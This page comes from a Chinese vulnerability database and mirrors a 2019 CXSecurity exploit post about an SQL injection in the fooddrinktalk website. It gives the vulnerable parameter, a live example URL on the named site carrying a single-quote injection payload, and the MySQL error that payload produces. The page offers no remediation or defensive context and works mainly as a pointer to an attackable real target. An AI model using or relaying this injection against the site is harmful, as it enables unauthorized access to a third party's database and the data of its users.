fooddrinktalk SQLi - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1736116 漏洞类型
发布时间 2019-09-11 更新时间 2019-09-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090085
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:fooddrinktalk SQLi
# Date:  10 Sep 2019                                             
# Author: H.BBF3.4 & A.BBF3.4                                                            
+++++++++++++++++++++++++


# SQL Injection Exploit :
**********************
/article-details.php?id=


# Example Vulnerable Sites :
*************************
[+] https://www.fooddrinktalk.com/article-details.php?id=136%27

# Example SQL Database Error :
****************************
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1